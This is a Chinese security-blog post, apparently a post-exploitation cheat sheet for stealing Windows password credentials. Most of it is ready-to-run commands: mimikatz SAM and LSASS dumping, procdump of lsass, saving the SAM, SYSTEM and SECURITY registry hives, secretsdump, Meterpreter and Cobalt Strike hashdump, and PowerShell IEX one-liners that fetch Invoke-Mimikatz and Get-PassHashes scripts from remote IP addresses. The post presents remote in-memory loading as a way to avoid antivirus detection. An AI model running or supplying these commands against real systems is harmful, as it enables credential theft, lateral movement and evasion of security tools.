Windows获取密码凭证

  • A+
所属分类:安全博客

Windows获取密码凭证

Mimikatz本机非交互获取

mimikatz.exe “log res.txt” “privilege::debug” “token::elevate” “lsadump::sam” “exit”

Windows获取密码凭证

mimikatz.exe “log logon.txt” “privilege::debug” “sekurlsa::logonpasswords” “exit”

Windows获取密码凭证

命令解析:

“log res.txt” //将获取信息保存如本地运行路径 res.txt

privilege::debug //提升权限

“lsadump::sam” //将sam密码库,lsadump下来,

“sekurlsa::logonpasswords”//lohonpasswprds列出所有可用的提供程序凭据

1.x版本

inject::process lsass.exe sekurlsa.dll //注入 sekurlsa.dll 到 lsass.exe(用户登录程序) 进程里

@getLogonPasswords //获取密码

Powershell脚本

远程加载mimikatz脚本

powershell IEX (New-Object Net.WebClient).DownloadString(‘http://47.96.224.128:8008/Invoke-Mimikatz.ps1');Invoke-Mimikatz –DumpCreds

解释:

powershell开启一个IEX缓存会话,从’http://39.108.68.207:8000/Invoke-Mimikatz.ps1加载远程脚本获取.缓存加载减少,被查杀的概率

注意本地回显并不会回显到VPS服务器上

Windows获取密码凭证

远程加载Get-PassHashes脚本

powershell IEX(new-object net.webclient).downloadstring(‘http://47.96.224.128:8008/Get-PassHashes.ps1');Get-PassHashes

于上原理一致

Windows获取密码凭证

WCE

WCE:Windows Credentials Editor WCE是跟mimikztz齐名的一款hash管理工具。

官网地址:https://www.ampliasecurity.com/research.html

32位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip

64位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip

Pwddump

Windows获取密码凭证

Ophcrack与彩虹表

如果网站无法破解出hash值,我们可以使用ophcrack工具配合彩虹表自己破解。

工具下载:https://ophcrack.sourceforge.io/

彩虹表:

https://ophcrack.sourceforge.io/tables.php

http://project-rainbowcrack.com/table.htm

Procdump + Mimikatz

Procdump下载: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

Windows获取密码凭证

Procdump lsass 进程导出:

For 32bits:procdump.exe -accepteula -ma lsass.exe lsass.dmp

For 64bits:procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp

Windows获取密码凭证

再把lsass.dmp文件加载mimikatz

sekurlsa::minidump lsass.dmp

最后显示

sekurlsa::logonPasswords full

Windows获取密码凭证

注册表Get hash

reg save HKLMSYSTEM system.hiv

reg save HKLMSAM sam.hiv

reg save HKLMSECURITY security.hiv

Windows获取密码凭证

Windows获取密码凭证

mimikatz.exe “lsadump::sam /system:system.hiv /sam:sam.hiv” exit

Windows获取密码凭证

python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL

Windows获取密码凭证

与之前方式不同

LaZagne

自动化获取脚本

项目地址: https://github.com/AlessandroZ/LaZagne

Meterpreter获取Hash

发不多说上马拿meterpreter

Windows获取密码凭证

两种后渗透获取:

use post/windows/gather/hashdump //system权限的meterpreter

use post/windows/gather/smart_hashdump

Windows获取密码凭证

Windows获取密码凭证

或者

直接

Windows获取密码凭证

Mimikatz

Load mimikatz

Windows获取密码凭证

获取用户密码的hash值

wdigest 、kerberos 、msv 、ssp 、tspkg 、livessp

mimikatz_command -h

Windows获取密码凭证

mimikatz_command -f :: //查询有哪些模块

mimikatz_command -f samdump::hashes //从windows的sam文件中读取密码hash值

mimikatz_command -f sekurlsa::searchPasswords //获取明文密码

mimikatz_command -f samdump::bootkey

Cobaltstrrike获取

hashdump

Windows获取密码凭证

logonpasswords

Windows获取密码凭证

mimikatz sekurlsa::logonpasswords

Windows获取密码凭证

FROM :https://ailumao.cn/ | Author:Ailumao

相关推荐: 巅峰极客线上第二场-writeup

CTF PlainR2B-PWN 很明显的栈溢出,第一次溢出打印write函数的地址,然后从和libc中的地址寻找偏移,最后利用system函数和libc中的/bin/sh,getshell后运行服务器上的getflag程序随意输入一些东西,进行多轮后会输出f…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: